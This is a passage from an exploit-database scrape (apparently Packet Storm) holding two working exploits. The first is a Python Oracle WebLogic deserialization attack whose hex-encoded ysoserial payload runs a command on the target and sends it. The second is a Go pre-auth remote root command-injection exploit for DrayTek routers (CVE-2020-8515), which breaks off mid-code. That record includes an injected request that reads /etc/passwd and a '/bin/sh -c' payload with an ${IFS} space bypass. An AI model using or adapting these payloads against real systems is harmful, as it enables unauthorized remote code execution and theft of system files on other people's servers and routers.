'\\n[+]Received \"%s\"' % data \n \n \n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload. 
\n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length \nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x
00\\x78\\xfe\\x01\\x00\\x00' \n \n \n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out \n#len(payload) is xxxx bytes \n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. \n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. \n \n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) \nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x8
2\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6
d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6
e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\" \n \n \nchunk3 = 
'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x6
6\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78' \n \ntotallength = len(chunk1) + len(chunk2) + len(chunk3) \nprint \"[+]TOTAL payload length: \", totallength \n \n#Update the TOTAL payload length in Chunk1 \nlen_hex = hex(totallength) \nprint \"[+]Payload length in HEX: \", len_hex \nlen_hex = len_hex.replace('0x', 
'0') \nprint \"[+]Payload length in HEX: \" , len_hex \n \ns1 = len_hex[:2] \ns2 = len_hex[2:4] \nlen_hex = unhexlify(s1 + s2) \n \nprint \"[+]Payload length in HEX now: \", len_hex \n \n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) \nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\" \n \nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x
67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n#print \"[+]Updated 'chunk1' : \\n\", chunk1 \n \n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1' \npayload = chunk1 + chunk2 + chunk3 \n \n#Adjust header for appropriate message length \npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:]) \nprint '[+]Sending payload...' \nsock.send(payload) \n \nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\" \nprint(\"\\n[+]Response to Request#: \\n\") \nresponse = sock.recv(15000) \nprint(response) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144405/oracleweblogic12-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-01T02:16:44", "description": "", "cvss3": {}, "published": "2020-03-31T00:00:00", "type": "packetstorm", "title": "DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-31T00:00:00", "id": "PACKETSTORM:156979", "href": "https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html", "sourceData": "`package main \n \n \n/* \nCVE-2020-8515: DrayTek pre-auth remote root RCE \nMon Mar 30 2020 - 0xsha.io \nAffected: \nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, \nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, \nand 1.4.4_Beta \nYou should upgrade as soon as possible to 1.5.1 firmware or later \nThis issue has been fixed in Vigor3900/2960/300B v1.5.1. 
\nread more : \nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html \nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ \nhttps://thehackernews.com/2020/03/draytek-network-hacking.html \nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ \nexploiting using keyPath \nPOST /cgi-bin/mainfunction.cgi HTTP/1.1 \nHost: 1.2.3.4 \nContent-Length: 89 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \n*/ \n \nimport ( \n\"fmt\" \n\"io/ioutil\" \n\"net/http\" \n\"net/url\" \n\"os\" \n\"strings\" \n) \n \nfunc usage() { \n \nfmt.Println(\"CVE-2020-8515 exploit by @0xsha \") \nfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" ) \nfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" ) \n} \n \nfunc main() { \n \n \nif len(os.Args) < 3 { \nusage() \nos.Exit(-1) \n} \n \ntargetUrl := os.Args[1] \n//cmd := \"cat /etc/passwd\" \ncmd := os.Args[2] \n \n \n// payload preparation \nvulnerableFile := \"/cgi-bin/mainfunction.cgi\" \n// specially crafted CMD \n// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \npayload :=`' \n/bin/sh -c 'CMD' \n'` \npayload = strings.ReplaceAll(payload,\"CMD\", cmd) \nbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\") \n \n//PostForm call url encoder internally 